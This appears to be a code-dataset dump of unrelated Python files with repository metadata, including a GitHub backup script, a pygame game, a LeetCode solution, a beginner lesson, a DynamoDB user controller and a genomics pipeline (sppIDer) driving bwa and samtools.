OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # import argparse import fnmatch import getpass import os import shutil import sys import git import github import yaml __version__ = '1.0' def _get_github(arguments, config): if arguments.auth_token: gh = github.Github(arguments.auth_token) elif arguments.auth_user: password = getpass.getpass("{0}@github.com: ".format(arguments.auth_user)) gh = github.Github(arguments.auth_user, password) else: gh = github.Github(config['token']) return gh def _backup_repo(repo_url, destination): repo = None if os.path.isdir(destination): repo = git.Repo(destination) for remote in repo.remotes: remote.fetch() else: try: repo = git.Repo.clone_from(repo_url, destination) except git.exc.GitCommandError: if os.path.isdir(destination): shutil.rmtree(destination) return repo def backup_repo(repo, destination): destination = os.path.join(destination, *repo.full_name.split('/')) _backup_repo(repo.ssh_url, destination) def backup_wiki(repo, destination): destination = os.path.join(destination, *repo.full_name.split('/')) + '.wiki' _backup_repo(repo.ssh_url[:-4] + '.wiki.git', destination) def repo_matches_rules(rules, repo_slug, default=True): for rule in rules: result = True if rule.startswith('!'): result = False rule = rule[1:] if fnmatch.fnmatch(repo_slug, rule): return result return default def main(): parser = argparse.ArgumentParser(description='GitHub Backup', conflict_handler='resolve') parser.add_argument('-v', '--version', action='version', version='%(prog)s Version: ' + __version__) auth_type_parser_group = parser.add_mutually_exclusive_group() auth_type_parser_group.add_argument('--auth-token', dest='auth_token', help='authenticate to github with a token') auth_type_parser_group.add_argument('--auth-user', dest='auth_user', help='authenticate to github with credentials') parser.add_argument('--dry-run', action='store_true', default=False, help='do not backup any repositories') parser.add_argument('config', type=argparse.FileType('r'), help='the configuration file') arguments = parser.parse_args() config = yaml.safe_load(arguments.config) gh = _get_github(arguments, config) user = gh.get_user() repos = [] for repo in user.get_repos(): if not repo_matches_rules(config['rules'], repo.full_name): continue repos.append(repo) print("rules matched {0:,} repositories".format(len(repos))) destination = config['destination'] if not os.path.isdir(destination): os.makedirs(destination) width = len(str(len(repos))) for idx, repo in enumerate(repos, 1): print("[{0: >{width}}/{1: >{width}}] processing: {2}".format(idx, len(repos), repo.full_name, width=width)) if arguments.dry_run: continue backup_repo(repo, destination) if 'wikis' in config['include'] and repo.has_wiki: backup_wiki(repo, destination) return 0 if __name__ == '__main__': sys.exit(main())
[ "zeroSteiner@gmail.com" ]
zeroSteiner@gmail.com
021d848039bc9120c983a8803aeb88354a9905c5
5a3b5e97dd995da304a3cdc8588c196307938dab
/Start2Run.py
d7400a2ec27b4eb316602d6dfcc0f3d49c7c9b6c
[]
no_license
micai20171009/mouse
dd43617f6adcfc0820dbfb6e46cf702f5f32c2b3
74402f5a008636540a3e1b07a8069d15ed577857
refs/heads/master
2021-04-12T08:27:27.918839
2018-03-19T14:26:02
2018-03-19T14:26:02
125,953,744
0
0
null
2018-03-20T03:12:37
2018-03-20T03:12:37
null
UTF-8
Python
false
false
821
py
import os import sys import utils_params import runner import utils_log BASE_FILE = os.path.dirname(os.path.abspath(__file__)) if __name__ == "__main__": test_modules = {} requirement_id = '' case_list = [] if len(sys.argv) < 2: print "Usage of %s:" % sys.argv[0] print " For run test loop please add $requirement_id" print " For run test case please add $requirement_id $case_id_1 $case_id_2 $case_id_3 ..." sys.exit(1) if len(sys.argv) >= 2: requirement_id = sys.argv[1] for case in sys.argv[2:]: case_list.append(case) params = utils_params.Params(requirement_id, case_list) log_dir = utils_log.create_log_file(requirement_id) params.get('log_dir', log_dir) runner = runner.CaseRunner(params) runner.main_run()
[ "yhong@redhat.com" ]
yhong@redhat.com
3fb43fde0c3c30ff359ad45502555447f39d8cdb
6543e5bfec2f2d89ac6a7e42e8f38d2f3df26615
/1306JumpGameIII.py
5545d7464d227a8cbade8389f59323cc7f68b298
[]
no_license
adityachhajer/LeetCodeSolutions
bc3136fa638a3b2c7d35e419a063e9ce257bc1af
693fd3aef0f823f9c3cfc14c3d1010584b7a762d
refs/heads/master
2023-02-17T08:21:00.064932
2021-01-19T14:05:08
2021-01-19T14:05:08
270,973,258
2
1
null
2020-09-30T18:30:21
2020-06-09T10:33:39
Python
UTF-8
Python
false
false
532
py
class Solution: def solve(self,arr,start,ans): if start>=len(arr) or start<0: return False elif arr[start]==0: # ans[start]=True return True elif ans[start]==1: return False else: ans[start]=1 return self.solve(arr, start+arr[start], ans) or self.solve(arr,start-arr[start],ans) def canReach(self, arr: List[int], start: int) -> bool: ans = [0] * len(arr) return self.solve(arr, start, ans)
[ "noreply@github.com" ]
adityachhajer.noreply@github.com
467e17853ada885fa0d37ed0071733eda9281dbe
55b4e2af8ce2a7ad282eee11a6c6611f3eafaed5
/jumper.py
4db12882f3121ddfb06ca6236e3e9bf8ca1c2422
[]
no_license
electricdarb/bored-projects
2b0a092560c1e5d5bdc3dca3d3cfd45c27fca36d
ef0ea532bd248c081c402f20b410342a45beddfd
refs/heads/master
2020-12-20T23:06:20.549449
2020-04-25T00:56:02
2020-04-25T00:56:02
236,235,216
0
0
null
null
null
null
UTF-8
Python
false
false
3,483
py
import pygame from util import randomize_color, sequencial_color, box import math import random from time import sleep from time import time """ this is honestly some of my worst code, im writing this during class bc class is boring i was writing fast, some small aspects are hard coded. this was stupid of me comments are sub par """ pygame.init() figure_size = 500 window = pygame.display.set_mode((figure_size, figure_size)) def draw_text(surf, text, size, x, y): font = pygame.font.Font(pygame.font.match_font('arial'), size) text_surface = font.render(text, True, (255, 255, 255)) text_rect = text_surface.get_rect() text_rect.midtop = (x, y) surf.blit(text_surface, text_rect) floorTop = 50 # distance from the bottom player = box(100, floorTop) floor = [box(-15, 0, h = figure_size)] dis = 12.5 # distance between each block for i in range(1, math.ceil(figure_size/dis)): colo = sequencial_color(floor[i-1].color, step = 20) floor.append(box(i*dis, 0, color = colo, h = figure_size)) floorVelo = 5 floorLen = len(floor) player = box(50, figure_size-floorTop-100) keys = pygame.key.get_pressed() playerVelo = 0 veloJump = -50 grav = 50 # gravity on player dt= .1 gapDistance = 100 def bar_gen(xpos): topPos = random.randint(round(figure_size/10), round(figure_size*2/5)) topbar = box(xpos, 0, h = topPos, w = 25) bottombar = box(xpos, topPos + gapDistance , h = figure_size - topPos - gapDistance, w= 25) return [topbar, bottombar] bars = [] bar_separation = 200 for i in range(3): bars.append(bar_gen(figure_size+i*700))# multiplying by -1 so we still have a list of 3 but they are irelivant to the fig score = 0 t = time() active = True run = True while run: for event in pygame.event.get(): if event == pygame.QUIT: run = False keys = pygame.key.get_pressed() if keys[pygame.K_q]: run = False if keys[pygame.K_SPACE] and t < time() - .1: t = time() playerVelo += veloJump playerVelo += grav*dt player.y += playerVelo*dt # draw section window.fill((0, 0, 0)) for i in range(len(bars)): for box in bars[i]: box.x -= floorVelo if bars[i][0].x < figure_size - bar_separation + floorVelo and bars[i][0].x > figure_size - bar_separation - floorVelo: xpos = figure_size topPos = random.randint(round(figure_size / 10), round(figure_size * 2 / 5)) newIndex =(i+2)%3 bars[newIndex][0].x = xpos bars[newIndex][0].h = topPos bars[newIndex][1].x = xpos bars[newIndex][1].y = topPos + gapDistance bars[newIndex][1].h = figure_size - topPos - gapDistance if bars[i][0].x + 25 > player.x and bars[i][0].x < player.x: if bars[i][0].h > player.y or bars[i][0].h + gapDistance - 25 < player.y: floorVelo = 0 playerVelo = 500 # i am not ending the loop bc the the loop will end when the player hits the ground else: score+=1 if player.y > figure_size: sleep(1) run = False for bar in bars: for box in bar: pygame.draw.rect(window, box.color, (box.x, box.y, box.w, box.h)) pygame.draw.rect(window, player.color, (player.x, player.y, player.w, player.h)) draw_text(window, "Score: {}".format(score), 40, 100, 20) pygame.display.update()
[ "noreply@github.com" ]
electricdarb.noreply@github.com
27f04a2798064a552630d19e0789beea800c099a
5e5a13e522fdb0797f24bb7b273b3873e31c70fa
/lesson2.py
5e27812224a792e72d313ff19169f1706a5ceb4c
[]
no_license
niha28/bingo_python_lesson
d04be0953dc948ce25116b099dea6619a6a0ba9b
afacf4f428b3dccbdd045d1176b931525d1b23ce
refs/heads/master
2023-06-24T17:16:48.559058
2021-07-19T06:50:46
2021-07-19T06:50:46
386,899,734
0
0
null
null
null
null
UTF-8
Python
false
false
1,517
py
# プログラミングの基礎である計算とデータの形を学ぶ # 文字列と数字が違うものということだけしっかり伝えてください. # データの形による出力の差 # pythonでは数字と文字は別々なもの print(1) # 数字の場合は計算される print(1+2+3) # 文字の場合はそのまま出る print("1+2+3") # 四則演算に関する演算子 # 和差積商ができる print(3-2+1) A = 3*2+(3-5)/2 print(A) # 割り算のあまり print(3%2) # 割り算の切り捨て print(7//3) # 乗算 print(3**5) # inputで入力された値は文字列 """ print("足し算をするよ") x = input("好きな数字を入力してね") y = input("もう一つ好きな数字を入力してね") print(x + y) """ print("足し算をするよ") x = input("好きな数字を入力してね") y = input("もう一つ好きな数字を入力してね") # intで数字に変換できる x = int(x) y = int(y) print(x+y) import tkinter def tashizan(): mozi1 = entry1.get() mozi2 = entry2.get() x = int(mozi1) y = int(mozi2) button["text"] = x+y root = tkinter.Tk() root.title("keisan") # 画面サイズを設定する root.geometry("800x600") label = tkinter.Label(root, text="Lets tashizan") label.place(x=200, y=100) entry1 = tkinter.Entry(width=10) entry1.place(x=10, y=10) entry2 = tkinter.Entry(width=10) entry2.place(x=100, y=10) button = tkinter.Button(text="tashizan", command=tashizan) button.place(x=50, y=50) root.mainloop()
[ "u55773sh@gmail.com" ]
u55773sh@gmail.com
fe1a0e8c9ddaa1a7fa94404a66e4dc8769440385
e2a006a139330bca613169e547e185b1a5048646
/L8/busca_punto.py
a31fad5cb4ef87ebcb323606529b9ccf720bee06
[]
no_license
Mi7ai/EI1022
013d54d470b38c125503c0173b355cc7bc681784
f80d5b4f99e1427fd5c2673499a3eee0d1dfc1ca
refs/heads/master
2020-03-29T13:54:58.231532
2018-12-05T13:50:27
2018-12-05T13:50:27
149,988,593
0
0
null
null
null
null
UTF-8
Python
false
false
976
py
def busca_punto_rec(v): def rec(b: int, e:int ): if e-b == 0: return None h = (b+e)//2 if v[h] < h: return rec(h,e) elif v[h] > h: return rec(b,h) else: return h return rec(0, len(v)) #para acasa hacrlo sin recursividad # def busca_punto_fijo(v): # def rec(b: int, e:int ): # #cond de parada del while if e-b == 0: return None # # #dentro del while # h = (b+e)//2 # if v[h] < h: # return rec(h,b) # elif v[h] > h: # return rec(b,h) # else: # return h # #hasta aqui # return rec(0, len(v)) def busca_punto_pico(v): def rec(b: int, e: int): if e-b == 1: return b h = (b+e)//2 #mitad if v[h] <= h: return rec(h, e) return rec(b,h) return rec(0, len(v)) if __name__ == "__main__": v = [-10, -5, 1, 15, 3, 6] print(busca_punto_pico(v))
[ "hottmayer@gmail.com" ]
hottmayer@gmail.com
7e8185b954c7aad21024d466b6adf503e4442918
4664bb1572d1d9bb90f99a11016d0fbe9b28c632
/search/utils/constants.py
647ceca9fa4eb44b99e06938b96dd418393a4d69
[]
no_license
prdx/Indexer
32cfbf05dfec595c00550322859260c15a2906e8
08b52734b293cb2f0a57ed74d818ece70425711f
refs/heads/master
2020-03-22T23:22:27.947273
2018-07-20T16:27:40
2018-07-20T16:27:40
null
0
0
null
null
null
null
UTF-8
Python
false
false
494
py
class Constants: CACHE_PATH = './cache/' DATA_PATH = './AP_DATA/ap89_collection/' DOC_TYPE = 'document' DOCLIST_PATH = './AP_DATA/processed_doclist.txt' ES_SCRIPTS_PATH = './es/' INDEX_NAME = 'ap89_collection' MAX_OUTPUT = 1000 RESULTS_PATH = './results/' STOPWORDS_PATH = './AP_DATA/stoplist.txt' USE_STEMMING = False QUERY_LIST_PATH = './AP_DATA/query_desc.51-100.short.txt' QUERY_LIST_PATH_FOR_PS = './AP_DATA/query_desc.51-100.short.ps.txt'
[ "astungkara.project@gmail.com" ]
astungkara.project@gmail.com
60fa94a477c735bce770c654cb01942e4d75606d
910abac65a2e48139956e727b90b84225ff3554a
/src/controller/user.py
3a530fb72fadd3cc40c7ee3e6572b3cfe2f4f4f6
[]
no_license
joaocpinto/serverless-api-bootstrap
823abd38533953db26ed6666db8fa26e8a1e0832
484aa960d4fef8c30a52e4cee72e512a38e1a4f5
refs/heads/main
2023-08-11T01:44:05.799520
2021-09-26T21:22:06
2021-09-26T21:22:06
410,648,811
0
0
null
2021-09-26T21:22:07
2021-09-26T19:54:49
Python
UTF-8
Python
false
false
1,594
py
import json from aws_lambda_powertools import Logger from datetime import date from src.helper.config import Config from src.service.dynamodb import DynamoDbService from src.model.user import UserModel class UserController: """ Class containing user logic """ def __init__(self, logger: Logger = None): self.__dynamodb_service = DynamoDbService(Config.DYNAMODB_TABLE.value) self.__logger = logger if logger else Logger(service="UserController") def __convert_to_dict(self, user: UserModel) -> dict: user_dict = json.loads(user.json()) return user_dict def save_user(self, username: str, dateOfBirth: date): self.__logger.info("Saving an user...") user = UserModel(username=username, dateOfBirth=dateOfBirth) self.__dynamodb_service.put_item(item=self.__convert_to_dict(user)) def get_user(self, username: str): self.__logger.info("Getting an user...") existing_user = self.__dynamodb_service.get_item(username=username) if existing_user is None: return None user = UserModel(**existing_user) return user def get_user_message(self, username: str): self.__logger.info("Getting an user message...") user_message = "" user = self.get_user(username) if user: if user.is_birthday(): user_message = f"Hello, {user.username}! Happy birthday!" else: user_message = f"Hello, {user.username}! Your date of birth is {user.dateOfBirth}" return user_message
[ "joao.caldeira.pinto@gmail.com" ]
joao.caldeira.pinto@gmail.com
3c5a792df436f3e0e34534c2f0ed5d38c96f3568
ace3b915478d60af81ec1439a4edb4849a87baee
/envname/bin/pip3
283bbf83e9b528687c90db6714772a3f49bb11aa
[]
no_license
Satya753/DYNAMIC-SLICING
1dbec199350bdc97fbe72f4cf6a7843052fd5c58
3725a17fe8631a7e55c7b15a898b8c94c1bcf683
refs/heads/master
2022-11-12T17:23:29.330248
2020-07-07T14:22:04
2020-07-07T14:22:04
257,921,691
2
0
null
null
null
null
UTF-8
Python
false
false
259
#!/home/satya/Documents/dyn_slice/envname/bin/python3 # -*- coding: utf-8 -*- import re import sys from pip._internal.cli.main import main if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(main())
[ "satyajeet753@gmail.com" ]
satyajeet753@gmail.com
8c70839fbca911c28cb64833edc09ca68c394b6f
e7605b31e3c6ff5558c171ee7fc4c7e7f7276694
/scripts/sppIDer_lite.py
e3edd378c9567f74bedadb6e9a62f5f098876dd0
[]
no_license
JingxuanChen7/sppIDer
e0bdad8e8b1f421d1dcefd5bbf07baf0f625267b
b2e465c265f16e8c801ffdd54861eb8a2a43058d
refs/heads/master
2020-05-07T15:53:09.846610
2019-04-26T21:27:05
2019-04-26T21:27:05
180,657,454
0
0
null
2019-04-10T20:19:27
2019-04-10T20:19:27
null
UTF-8
Python
false
false
8,803
py
__author__ = 'Quinn' import argparse, multiprocessing, sys, re, subprocess, time ################################################################ # This script runs the full sppIDer pipeline. # Before running this you must make your combination reference genome with the script combineRefGenomes.py # This script will map short-read data to a combination reference genome and parse the outputs to create a summary of # where and how well the reads map to each species in the combinaiton reference genome. # #Program Requirements: bwa, samtools, bedtools, R, Rpackage ggplot2, Rpackage dplyr #Input: Output name, Combination reference genome, fastq short-read files # ################################################################ parser = argparse.ArgumentParser(description="Run full sppIDer") parser.add_argument('--out', help="Output prefix, required", required=True) parser.add_argument('--ref', help="Reference Genome, required", required=True) parser.add_argument('--r1', help="Read1, required", required=True) parser.add_argument('--r2', help="Read2, optional") parser.add_argument('--byBP', help="Calculate coverage by basepair, optional, DEFAULT, can't be used with -byGroup", dest='bed', action='store_true') parser.add_argument('--byGroup', help="Calculate coverage by chunks of same coverage, optional, can't be used with -byBP", dest='bed', action='store_false') parser.add_argument('--work', help="Set working Dir") parser.add_argument('--script', help="Set script Dir") parser.add_argument('--thread', help="Add option to set cpu number") parser.add_argument('--stepsize', help="set the window size") parser.set_defaults(bed=True) args = parser.parse_args() # docker vars scriptDir = args.script workingDir = args.work numCores = args.thread stepSize = args.stepsize outputPrefix = args.out refGen=args.ref read1Name = args.r1 if args.r2: read2Name = args.r2 start = time.time() def calcElapsedTime( endTime ): trackedTime = str() if 60 < endTime < 3600: min = int(endTime) / 60 sec = int(endTime - (min * 60)) trackedTime = "%s mins %s secs" % (min, sec) elif 3600 < endTime < 86400: hr = int(endTime) / 3600 min = int((endTime - (hr * 3600)) / 60) sec = int(endTime - ((hr * 60) * 60 + (min * 60))) trackedTime = "%s hrs %s mins %s secs" % (hr, min, sec) elif 86400 < endTime < 604800: day = int(endTime) / 86400 hr = int((endTime - (day * 86400)) / 3600) min = int((endTime - (hr * 3600 + day * 86400)) / 60) sec = int(endTime - ((day * 86400) + (hr * 3600) + (min * 60))) trackedTime = "%s days %s hrs %s mins %s secs" % (day, hr, min, sec) elif 604800 < endTime: week = int(endTime) / 604800 day = int((endTime)-(week * 604800) / 86400) hr = int((endTime - (day * 86400 + week * 604800)) / 3600) min = int((endTime - (hr * 3600 + day * 86400 + week * 604800)) / 60) sec = int(endTime - ((week * 604800) + (day * 86400) + (hr * 3600) + (min * 60))) trackedTime = "%s weeks %s days %s hrs %s mins %s secs" % (week, day, hr, min, sec) else: trackedTime = str(int(endTime)) + " secs" return trackedTime trackerOut = open(workingDir + outputPrefix + "_sppIDerRun.info", 'w') trackerOut.write("outputPrefix="+args.out+"\n") trackerOut.write("ref="+refGen+"\n") trackerOut.write("read1=" + read1Name + "\n") if args.r2: trackerOut.write("read2=" + read2Name + "\n") if args.bed == False: trackerOut.write("coverage analysis option = by coverage groups, bedgraph format -bga\n") else: trackerOut.write("coverage analysis option = by each base pair -d\n") trackerOut.close() ########################## BWA ########################### bwaOutName = outputPrefix + ".sam" bwaOutFile = open(workingDir + bwaOutName, 'w') if args.r2: print("Read1=" + read1Name + "\nRead2=" + read2Name) subprocess.call(["bwa", "mem", "-t", numCores, refGen, read1Name, read2Name], stdout=bwaOutFile, cwd=workingDir) else: print("Read1=" + read1Name) subprocess.call(["bwa", "mem", "-t", numCores, refGen, read1Name], stdout=bwaOutFile, cwd=workingDir) bwaOutFile.close() print("BWA complete") currentTime = time.time()-start elapsedTime = calcElapsedTime(currentTime) print("Elapsed time: " + elapsedTime) trackerOut = open(workingDir + outputPrefix + "_sppIDerRun.info", 'a') trackerOut.write("BWA complete\nElapsed time: " + elapsedTime) trackerOut.close() ########################## samtools ########################### samViewOutQual = outputPrefix + ".view.bam" bamSortOut = outputPrefix + ".sort.bam" samViewQualFile = open(workingDir + samViewOutQual, 'w') subprocess.call(["samtools", "view", "-@", numCores, "-q", "3", "-bhSu", bwaOutName], stdout=samViewQualFile, cwd=workingDir) samViewQualFile.close() subprocess.call(["samtools", "sort", "-@", numCores, samViewOutQual, "-o", bamSortOut], cwd=workingDir) print("SAMTOOLS complete") currentTime = time.time()-start elapsedTime = calcElapsedTime(currentTime) print("Elapsed time: " + elapsedTime) trackerOut = open(workingDir + outputPrefix + "_sppIDerRun.info", 'a') trackerOut.write("\nSAMTOOLS complete\nElapsed time: " + elapsedTime) trackerOut.close() ########################## parse SAM file ########################### #subprocess.call(["python2.7", scriptDir + "parseSamFile.py", # outputPrefix, workingDir], cwd=workingDir) #print("Parsed SAM file") #currentTime = time.time()-start #elapsedTime = calcElapsedTime(currentTime) #print("Elapsed time: " + elapsedTime) #trackerOut = open(workingDir + outputPrefix + "_sppIDerRun.info", 'a') #trackerOut.write("\nParsed SAM\nElapsed time: " + elapsedTime) #trackerOut.close() ########################## plot MQ scores ########################### #subprocess.call(["Rscript", scriptDir + "MQscores_sumPlot.R", # outputPrefix, workingDir], cwd=workingDir) #print("Plotted MQ scores") #currentTime = time.time()-start #elapsedTime = calcElapsedTime(currentTime) #print("Elapsed time: " + elapsedTime) #trackerOut = open(workingDir + outputPrefix + "_sppIDerRun.info", 'a') #trackerOut.write("\nMQ scores plotted\nElapsed time: " + elapsedTime) #trackerOut.close() ########################## bedgraph Coverage ########################### sortOut = bamSortOut if args.bed == True: bedOutD = outputPrefix + "-d.bedgraph" bedFileD = open(workingDir + bedOutD, 'w') subprocess.call(["genomeCoverageBed", "-d", "-ibam", sortOut], stdout=bedFileD, cwd=workingDir) bedFileD.close() else: bedOut = outputPrefix + ".bedgraph" bedFile = open(workingDir + bedOut, 'w') subprocess.call(["genomeCoverageBed", "-bga", "-ibam", sortOut], stdout=bedFile, cwd=workingDir) bedFile.close() print("bedgraph complete") currentTime = time.time()-start elapsedTime = calcElapsedTime(currentTime) print("Elapsed time: " + elapsedTime) trackerOut = open(workingDir + outputPrefix + "_sppIDerRun.info", 'a') trackerOut.write("\nbedgraph complete\nElapsed time: " + elapsedTime) trackerOut.close() ########################## average Bed ########################### if args.bed == True: subprocess.call(["Rscript", scriptDir + "meanDepth_sppIDer-d.R", outputPrefix, workingDir, stepSize], cwd=workingDir) else: subprocess.call(["Rscript", scriptDir + "meanDepth_sppIDer-bga.R", outputPrefix, workingDir], cwd=workingDir) print("Found mean depth") currentTime = time.time()-start elapsedTime = calcElapsedTime(currentTime) print("Elapsed time: " + elapsedTime) trackerOut = open(workingDir + outputPrefix + "_sppIDerRun.info", 'a') trackerOut.write("\nFound mean depth\nElapsed time: " + elapsedTime) trackerOut.close() ########################## make plot ########################### subprocess.call(["Rscript", scriptDir + "sppIDer_depthPlot_forSpc.R", outputPrefix, workingDir], cwd=workingDir) subprocess.call(["Rscript", scriptDir + "sppIDer_depthPlot.R", outputPrefix, workingDir], cwd=workingDir) # if args.bed == True: # subprocess.call(["Rscript", scriptDir + "sppIDer_depthPlot_forSpc.R", outputPrefix, "d"], cwd=workingDir) # subprocess.call(["Rscript", scriptDir + "sppIDer_depthPlot-d.R", outputPrefix], cwd=workingDir) # else: # subprocess.call(["Rscript", scriptDir + "sppIDer_depthPlot_forSpc.R", outputPrefix, "g"], cwd=workingDir) # subprocess.call(["Rscript", scriptDir + "sppIDer_depthPlot-bga.R", outputPrefix], cwd=workingDir) print("Plot complete") currentTime = time.time()-start elapsedTime = calcElapsedTime(currentTime) print("Elapsed time: " + elapsedTime) trackerOut = open(workingDir + outputPrefix + "_sppIDerRun.info", 'a') trackerOut.write("\nPlot complete\nElapsed time: " + elapsedTime + "\n") trackerOut.close()
[ "jc33471@uga.edu" ]
jc33471@uga.edu
60d9d38344aaddba363d2f41e13945ad44bac4c0
425be4acf66cd46fb2a9fd022ef5b748cdaef028
/29_includes/includes.py
1e5929c7b8f6690f159ef2ba930d3eb3aa92656a
[]
no_license
john-tettis/python-ds-practice
2888a38dbf3f4bb530a04f535b270e13ffef1433
261f9cefb8d5488acd6eb9354696f807152b5388
refs/heads/master
2023-03-06T04:20:09.338164
2021-02-18T18:07:36
2021-02-18T18:07:36
340,136,151
0
0
null
null
null
null
UTF-8
Python
false
false
1,303
py
def includes(collection, sought, start=None): """Is sought in collection, starting at index start? Return True/False if sought is in the given collection: - lists/strings/sets/tuples: returns True/False if sought present - dictionaries: return True/False if *value* of sought in dictionary If string/list/tuple and `start` is provided, starts searching only at that index. This `start` is ignored for sets/dictionaries, since they aren't ordered. >>> includes([1, 2, 3], 1) True >>> includes([1, 2, 3], 1, 2) False >>> includes("hello", "o") True >>> includes(('Elmo', 5, 'red'), 'red', 1) True >>> includes({1, 2, 3}, 1) True >>> includes({1, 2, 3}, 1, 3) # "start" ignored for sets! True >>> includes({"apple": "red", "berry": "blue"}, "blue") True """ if isinstance(collection, set): bool = sought in collection elif isinstance(collection, dict): if sought in collection.keys() or sought in collection.values(): bool = True else: bool = False else: if start: bool = sought in collection[start::] else: bool = sought in collection return bool
[ "johndavidtettis@gmail.com" ]
johndavidtettis@gmail.com
cada0de202a4c12c7482abbcfd7991b7cca60c85
92034199e3beb9830ff1d91447a68f207368ebe6
/pimdm/mld/wrapper/NoListenersPresent.py
063c81c82765c4c8fd2bcf3aea51f593331c8712
[ "MIT" ]
permissive
elvissmog/pim_dm
f6a90457ec7fed9d88a465bdf55e0f53e57cc2b6
75439b90bbfc5e2bbd8a91c12957b0aa4811aadb
refs/heads/master
2022-11-28T14:37:35.710024
2020-08-04T19:35:13
2020-08-04T19:35:13
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,182
py
from pimdm.utils import TYPE_CHECKING if TYPE_CHECKING: from ..RouterState import RouterState def get_state(router_state: 'RouterState'): return router_state.interface_state.get_no_listeners_present_state() def print_state(): return "NoListenersPresent" ''' def group_membership_timeout(group_state): get_state(group_state).group_membership_timeout(group_state) def group_membership_v1_timeout(group_state): get_state(group_state).group_membership_v1_timeout(group_state) def retransmit_timeout(group_state): get_state(group_state).retransmit_timeout(group_state) def receive_v1_membership_report(group_state, packet: ReceivedPacket): get_state(group_state).receive_v1_membership_report(group_state, packet) def receive_v2_membership_report(group_state, packet: ReceivedPacket): get_state(group_state).receive_v2_membership_report(group_state, packet) def receive_leave_group(group_state, packet: ReceivedPacket): get_state(group_state).receive_leave_group(group_state, packet) def receive_group_specific_query(group_state, packet: ReceivedPacket): get_state(group_state).receive_group_specific_query(group_state, packet) '''
[ "noreply@github.com" ]
elvissmog.noreply@github.com
d3b38d9183e453184a9cbc3ba6574a778fc49705
74649c1220c68ad0af79e420d572e3769fcd7a53
/_unittests/ut_documentation/test_run_notebooks_onnx_viz.py
6a0613ce77a5e839c1437dc40f2a84f34aab0076
[ "MIT" ]
permissive
sdpython/mlprodict
e62edcb428700cb2c4527e54e96431c1d2b36118
27d6da4ecdd76e18292f265fde61d19b66937a5c
refs/heads/master
2023-05-08T10:44:30.418658
2023-03-08T22:48:56
2023-03-08T22:48:56
112,469,804
60
13
MIT
2023-04-19T01:21:38
2017-11-29T11:57:10
Python
UTF-8
Python
false
false
991
py
# -*- coding: utf-8 -*- """ @brief test log(time=30s) """ import os import unittest from pyquickhelper.loghelper import fLOG from pyquickhelper.ipythonhelper import test_notebook_execution_coverage from pyquickhelper.pycode import ( add_missing_development_version, ExtTestCase ) import mlprodict class TestNotebookOnnxViz(ExtTestCase): def setUp(self): add_missing_development_version(["jyquickhelper"], __file__, hide=True) def test_notebook_onnx_vis(self): fLOG( __file__, self._testMethodName, OutputPrint=__name__ == "__main__") self.assertNotEmpty(mlprodict is not None) folder = os.path.join(os.path.dirname(__file__), "..", "..", "_doc", "notebooks") test_notebook_execution_coverage(__file__, "onnx_visualization", folder, this_module_name="mlprodict", fLOG=fLOG) if __name__ == "__main__": unittest.main()
[ "xavier.dupre@gmail.com" ]
xavier.dupre@gmail.com
b9099f1a563f84adefaa53edf66d68c304d29f0c
8ba71e08a06a8a77fd35bcaa630230f9185f1a2f
/ESIM/code/config.py
7e44df31ec90c4a205a773bf932ae62dd801ee9c
[]
no_license
wuyong97/work
0cdf7317ac6abe4309b93bc8881d459c47803e54
90c7d8fbad4250c18db44a5b1a7e89a9352903a9
refs/heads/master
2023-02-04T16:20:32.356138
2020-12-26T08:18:47
2020-12-26T08:18:47
266,905,400
3
1
null
2020-05-26T02:35:00
2020-05-26T00:11:50
Python
UTF-8
Python
false
false
425
py
class Config(object): def __init__(self): self.embedding_size = 100 # 词向量维度 self.hidden_num = 100 # 隐藏层规模 self.l2_lambda = 0.0 self.learning_rate = 0.0001 self.dropout_keep_prob = 0.5 self.attn_size = 200 self.K = 2 self.epoch = 20 self.batch_Size = 32 self.class_num = 2 self.max_length = 128
[ "noreply@github.com" ]
wuyong97.noreply@github.com
12ca9036ec5ee0d878ebaeb40f87f6d7bfe28b2d
4dd995a8b8137239871143780c463374284e8ab3
/hydrogen/common/middleware/reqwrapper.py
3c13578028c28b006a7ee89924b9b2b7f6a833cb
[]
no_license
kinglongchen/alligatorproxy
61bcf9a193b48d1d493eb5a44fbff0bb32ce9b1a
ddd19c30fcc35b7b50cb83c4b997383d29ac2d4f
refs/heads/master
2020-07-07T23:50:00.904043
2014-09-17T02:16:20
2014-09-17T02:16:20
null
0
0
null
null
null
null
UTF-8
Python
false
false
608
py
from common.dbop import Mysql import webob.dec import webob.exc class DBSessionWrapper(object): def __init__(self,app,kwargs): host = kwargs['host'] user=kwargs['user'] passwd = kwargs['passwd'] db = kwargs['db'] charset=kwargs['charset'] self.db_session=Mysql() self.db_session.connect(host,user,passwd,db,charset) self.app=app @webob.dec.wsgify def __call__(self,req): #print req.environ req.environ['db_session']=self.db_session return self.app(req) @classmethod def factory(cls,global_conf,**kwargs): def wrapper(app): return DBSessionWrapper(app,kwargs) return wrapper
[ "kinglong_chen@163.com" ]
kinglong_chen@163.com
82a1fc92fe198a109b3287ee4730928c9d081839
1978a9455159b7c2f3286e0ad602652bc5277ffa
/exercises/04_data_structures/task_4_8.py
e089dd1a02e42d41758421e563cf86a42a9f841c
[]
no_license
fortredux/py_net_eng
338fd7a80debbeda55b5915dbfba4f5577279ef0
61cf0b2a355d519c58bc9f2b59d7e5d224922890
refs/heads/master
2020-12-03T17:32:53.598813
2020-04-08T20:55:45
2020-04-08T20:55:45
231,409,656
0
0
null
null
null
null
UTF-8
Python
false
false
1,337
py
